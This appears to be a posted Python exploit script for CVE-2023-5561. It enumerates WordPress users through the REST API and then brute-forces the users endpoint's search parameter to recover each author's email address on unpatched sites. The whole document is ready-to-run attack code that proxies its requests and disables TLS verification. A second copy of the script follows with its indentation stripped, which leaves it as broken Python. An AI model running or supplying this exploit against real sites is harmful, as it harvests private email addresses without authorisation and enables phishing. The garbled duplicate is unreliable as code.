numanturle/CVE-2023-5561.py

## CVE-2023-5561.py
import requests
import string
import warnings
import json
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter('ignore',InsecureRequestWarning)

proxy = {
    "http":"127.0.0.1:8080",
    "https":"127.0.0.1:8080"
}

def init():
    parser = argparse.ArgumentParser(description='WP < 6.3.2 – Unauthenticated Post Author Email Disclosure CVE-2023-5561')
    parser.add_argument('-u','--host',help='Host', type=str, required=True)
    args = parser.parse_args()
    exploit(args)


def exploit(args):
    host = args.host
    users = extract_users(host)
    print("[+] Total users: " + str(len(users)))
    if len(users) > 0:
        print("[+] Extracting emails...")
        for user in users:
            email = extract_email(host, user)
            print("[+] " + user + ": " + email)
    else:
        print("[-] No users found or rest api not enabled")


def extract_users(host):
    wp_users = []
    url = host + "/wp-json/wp/v2/users"
    r = requests.get(url, verify=False, proxies=proxy)
    text_without_bom = r.text.encode().decode('utf-8-sig')
    result_json = json.loads(text_without_bom)
    for user in result_json:
        wp_users.append(user['slug'])
    return wp_users

def extract_email(host, user):
    print("[+] User: " + user)
    print("[+] Stage 1 - Extracting email suffix...")
    url = host + "/wp-json/wp/v2/users?search="
    stage1 = "@"
    restart = True
    while restart:
        restart = False
        for i in string.ascii_lowercase + string.digits + "._-":
            payload = stage1 + i
            r = requests.get(url + payload, verify=False, proxies=proxy)
            text_without_bom = r.text.encode().decode('utf-8-sig')
            if text_without_bom != "[]":
                if user in text_without_bom:
                    restart = True
                    stage1 = payload
                    break
    print("[+] User found: " + user + " - " + stage1 + " - Extracting email...")
    print("[+] Stage 2 - Extracting email prefix...")
    restart = True
    stage2 = stage1
    while restart:
        restart = False
        for i in string.ascii_lowercase + string.digits + "._-":
            payload = i + stage2
            r = requests.get(url + payload, verify=False, proxies=proxy)
            text_without_bom = r.text.encode().decode('utf-8-sig')
            if text_without_bom != "[]":
                if user in text_without_bom:
                    restart = True
                    stage2 = payload
                    break
    return stage2
if __name__ == "__main__":
    init()
	import requests
	import string
	import warnings
	import json
	import argparse
	from requests.packages.urllib3.exceptions import InsecureRequestWarning

	warnings.simplefilter('ignore',InsecureRequestWarning)

	proxy = {
	"http":"127.0.0.1:8080",
	"https":"127.0.0.1:8080"
	}

	def init():
	parser = argparse.ArgumentParser(description='WP < 6.3.2 – Unauthenticated Post Author Email Disclosure CVE-2023-5561')
	parser.add_argument('-u','--host',help='Host', type=str, required=True)
	args = parser.parse_args()
	exploit(args)


	def exploit(args):
	host = args.host
	users = extract_users(host)
	print("[+] Total users: " + str(len(users)))
	if len(users) > 0:
	print("[+] Extracting emails...")
	for user in users:
	email = extract_email(host, user)
	print("[+] " + user + ": " + email)
	else:
	print("[-] No users found or rest api not enabled")


	def extract_users(host):
	wp_users = []
	url = host + "/wp-json/wp/v2/users"
	r = requests.get(url, verify=False, proxies=proxy)
	text_without_bom = r.text.encode().decode('utf-8-sig')
	result_json = json.loads(text_without_bom)
	for user in result_json:
	wp_users.append(user['slug'])
	return wp_users

	def extract_email(host, user):
	print("[+] User: " + user)
	print("[+] Stage 1 - Extracting email suffix...")
	url = host + "/wp-json/wp/v2/users?search="
	stage1 = "@"
	restart = True
	while restart:
	restart = False
	for i in string.ascii_lowercase + string.digits + "._-":
	payload = stage1 + i
	r = requests.get(url + payload, verify=False, proxies=proxy)
	text_without_bom = r.text.encode().decode('utf-8-sig')
	if text_without_bom != "[]":
	if user in text_without_bom:
	restart = True
	stage1 = payload
	break
	print("[+] User found: " + user + " - " + stage1 + " - Extracting email...")
	print("[+] Stage 2 - Extracting email prefix...")
	restart = True
	stage2 = stage1
	while restart:
	restart = False
	for i in string.ascii_lowercase + string.digits + "._-":
	payload = i + stage2
	r = requests.get(url + payload, verify=False, proxies=proxy)
	text_without_bom = r.text.encode().decode('utf-8-sig')
	if text_without_bom != "[]":
	if user in text_without_bom:
	restart = True
	stage2 = payload
	break
	return stage2
	if __name__ == "__main__":
	init()